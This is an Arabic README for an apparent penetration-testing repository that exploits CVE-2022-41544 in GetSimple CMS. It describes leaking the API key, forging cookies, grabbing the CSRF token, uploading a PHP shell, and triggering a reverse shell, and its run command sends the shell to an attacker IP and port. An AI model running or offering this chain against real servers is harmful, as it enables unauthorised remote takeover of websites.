
نص استغلال Python لـ CVE-2022-41544 في GetSimple CMS. يؤتمت تسريب مفاتيح API، واستخراج رموز CSRF، وتحميل قشرة PHP، وتشغيل الصدفة العكسية لاختبار الاختراق.
يحتوي هذا المستودع على سكريبت لاستغلال ثغرة CVE-2022-41544 في نظام GetSimple CMS. يقوم السكريبت بعدة خطوات للتحقق من وجود الثغرات، تسريب مفاتيح API، تعيين ملفات تعريف الارتباط (cookies)، الحصول على رمز CSRF، رفع shell، وتفعيل shell.
telnetlib القديم حيث أنه لم يكن ضروريًا لوظيفة السكريبت.استنساخ المستودع:
git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
cd CVE-2022-41544
تثبيت التبعيات:
تأكد من تثبيت Python 3 بالإضافة إلى مكتبة requests.
pip3 install requests
تشغيل السكريبت:
python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
<target>: النطاق الهدف أو عنوان IP.<path>: المسار إلى تثبيت GetSimple CMS.<ip:port>: عنوان IP والمنفذ للـ shell العكسي.<username>: اسم المستخدم المسؤول لنظام GetSimple CMS.مثال:
python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin


print_the_banner(): يعرض لافتة مزخرفة باستخدام فن ASCII.get_version(target, path): يتحقق مما إذا كان إصدار GetSimple CMS الهدف معرضًا للخطر.api_leak(target, path): يحاول استرداد مفتاح API من ملف XML للترخيص.set_cookies(username, version, apikey): يعيّن ملفات تعريف الارتباط المطلوبة للطلبات اللاحقة بناءً على مفتاح API المسترد.get_csrf_token(target, path, headers): يستخرج رمز CSRF اللازم لرفع shell.upload_shell(target, path, headers, nonce, shell_content): يقوم برفع PHP shell إلى الخادم الهدف.shell_trigger(target, path): يفعل shell المرفوع لإنشاء اتصال shell عكسي.تقوم الدالة main() بتنسيق العملية بأكملها عن طريق استدعاء الدوال المذكورة أعلاه بالتسلسل لاستغلال ثغرة CVE-2022-41544.
تم تطوير هذا السكريبت بواسطة h3x0v3rl0rd.
هذا السكريبت مُقدم لأغراض تعليمية فقط. الوصول غير المصرح به إلى الأنظمة غير قانوني وغير أخلاقي. استخدم هذا السكريبت بمسؤولية وفقط على الأنظمة التي لديك إذن صريح باختبارها.
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.